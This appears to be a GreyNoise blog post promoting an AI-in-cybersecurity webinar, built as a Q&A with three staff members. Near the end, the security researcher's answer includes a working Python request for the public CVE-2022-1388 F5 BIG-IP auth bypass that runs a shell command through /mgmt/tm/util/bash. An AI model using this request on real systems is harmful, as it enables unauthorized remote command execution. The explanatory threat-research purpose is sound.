The cybersecurity market is undergoing a noticeable shift as AI is integrated into it, moving from AI as a replacement for Googling toward its real strengths in pattern recognition and anomaly detection. Many questions remain about what AI can truly achieve today and what the future holds. To address them, we assembled a panel of seasoned security professionals for an open discussion on the real potential of AI in cybersecurity and what is merely adding to the noise.

On Thursday, May 30th, GreyNoise is hosting a live webinar, “AI for Cybersecurity: Sifting the Noise.” To give you a taste of what’s to come, we asked each of our presenters a key question touching on one of the many topics we will explore in the discussion. Let’s dig into their answers below:

Bob Rudis, VP of Data Science and Research

Q: What do you think is currently the biggest lie about AI?

A: The biggest misconception is treating AI (particularly LLMs/GPTs) as more than just a tool. Unlike traditional machine learning or a dictionary/thesaurus, these systems are marketed as intelligent actors or companions. In reality, they are simply tools that excel at parsing human input and generating responses based on vast amounts of data. Their perceived intelligence comes from their ability to produce useful outputs by recognizing patterns in data, not from any inherent understanding or consciousness.

Daniel Grant, Principal Data Scientist

Q: What AI advancement in the past few years are you most excited about?

A: The most obvious advancement is the development of highly capable LLMs. Just a few years ago, getting GPT-2 to produce coherent text was a challenge. Now we have 70-billion-parameter models that can run on laptops and chatbots that can pass the Turing test at your local Toyota dealership. Another exciting advancement is the improved quality of vector databases, which allow direct, real-time access to entire datasets and reduce the need for compact machine learning models.
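To make the vector-database point concrete, here is a minimal sketch of the core operation these systems provide: storing embedding vectors and answering nearest-neighbor queries in real time. The vectors below are random stand-ins and the brute-force search is purely illustrative; production systems use approximate indexes (HNSW, IVF, and the like) to do this at scale.

```python
# Toy sketch of the core vector-database operation: nearest-neighbor
# search over embeddings. The vectors are random stand-ins; a real
# deployment would store model-generated embeddings and query them
# through an approximate index rather than brute force.
import numpy as np

rng = np.random.default_rng(0)

# Pretend corpus: 10,000 documents embedded into 384-dim vectors.
corpus = rng.normal(size=(10_000, 384)).astype(np.float32)
corpus /= np.linalg.norm(corpus, axis=1, keepdims=True)  # unit-normalize

def top_k(query: np.ndarray, k: int = 5) -> np.ndarray:
    """Return indices of the k corpus vectors most similar to `query`."""
    query = query / np.linalg.norm(query)
    sims = corpus @ query              # cosine similarity via dot product
    return np.argsort(-sims)[:k]       # highest similarity first

query_vec = rng.normal(size=384).astype(np.float32)
print(top_k(query_vec))  # indices of the 5 nearest documents
```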

Ron Bowes, Security Researcher

Q: What's the most surprising thing an AI you've used has surfaced?

A: At GreyNoise, we developed a tool called Sift, which runs traffic seen by honeypots through magic machine-learning algorithms to help us (and customers!) see what attackers are up to each day.
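As a purely hypothetical illustration (not Sift's actual implementation), the general pattern of featurizing raw honeypot requests and letting an unsupervised outlier detector surface the unusual ones might look something like this toy sketch:

```python
# Hypothetical toy sketch of anomaly detection over honeypot traffic.
# This is NOT how Sift works internally; it only illustrates the broad
# "run traffic through ML, surface the weird stuff" idea.
from sklearn.ensemble import IsolationForest
from sklearn.feature_extraction.text import HashingVectorizer

# Stand-in sample data; a real pipeline sees millions of requests a day.
common = [
    "GET / HTTP/1.1",
    "GET /favicon.ico HTTP/1.1",
    "GET /robots.txt HTTP/1.1",
]
requests_seen = common * 50 + ["POST /mgmt/tm/util/bash HTTP/1.1"]

# Hash character n-grams into fixed-size feature vectors.
vectorizer = HashingVectorizer(analyzer="char", ngram_range=(3, 5),
                               n_features=2**12)
X = vectorizer.fit_transform(requests_seen)

# Isolation forests score how easy each point is to isolate, i.e. how
# anomalous it is; lower decision-function scores mean more anomalous.
clf = IsolationForest(contamination=0.01, random_state=0).fit(X)
scores = clf.decision_function(X)

# Print the distinct requests, most anomalous first.
for req, score in sorted(set(zip(requests_seen, scores)), key=lambda t: t[1]):
    print(f"{score:+.3f}  {req}")
```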

One exploit that stood out to me a couple of months ago was an attempt to exploit F5 BIG-IP that I wrote about on our Labs Grimoire blog. I'd recently spent time tidying up our F5 BIG-IP rules, since there's a lot of overlap between the various vulnerabilities and exploits (that is, several different vulnerabilities use very similar-looking exploits, and some of our older tags were mixing them up). One of the exploits I ran into targeted CVE-2022-1388 (auth bypass), chained with CVE-2022-41800 (authenticated code execution, which I originally discovered and reported).

What was particularly interesting about that one was that they used the proof of concept (PoC) from the original CVE-2022-41800 disclosure, which I had designed to look super obvious, instead of the actual exploit we also released. Not only that, but because CVE-2022-41800 is an *authenticated* RCE, they combined my PoC with a separate authentication-bypass vulnerability (CVE-2022-1388), which already had an RCE exploit of its own that didn't require a secondary vulnerability (a sketch of that bypass follows this answer). So not only did they use the super obvious PoC, its usage was entirely unnecessary as well!

Presumably, the point of using this unusual combination was to avoid detection, but instead they just stood out more!
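For context on why that chain looks so odd in traffic: the auth-bypass half, CVE-2022-1388, is already sufficient for remote code execution on its own. Based on the widely published public PoC for this long-patched bug, the bypass boils down to an HTTP hop-by-hop header trick; the sketch below, with a placeholder target and shown for illustration only, captures its rough shape:

```python
# Rough shape of the public CVE-2022-1388 auth bypass (long since
# patched), shown only to illustrate the traffic pattern discussed above.
# TARGET is a placeholder (a TEST-NET-1 documentation address).
import requests

TARGET = "https://192.0.2.1"

# Listing X-F5-Auth-Token in the Connection header causes the front-end
# proxy to strip the token as a hop-by-hop header; the back-end then
# falls back to trusting HTTP Basic auth as "admin" with an empty password.
headers = {
    "Authorization": "Basic YWRtaW46",            # base64("admin:")
    "X-F5-Auth-Token": "anything",
    "Connection": "keep-alive, X-F5-Auth-Token",
}

resp = requests.post(
    f"{TARGET}/mgmt/tm/util/bash",
    headers=headers,
    json={"command": "run", "utilCmdArgs": "-c id"},
    verify=False,   # lab illustration only; ignores TLS warnings
    timeout=10,
)
print(resp.status_code, resp.text)
```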

---

If these insights pique your interest, join us on Thursday for the live event, where you can put your own questions to our expert panel.

This article is a summary of the full, in-depth version on the GreyNoise Labs blog; read the full report there.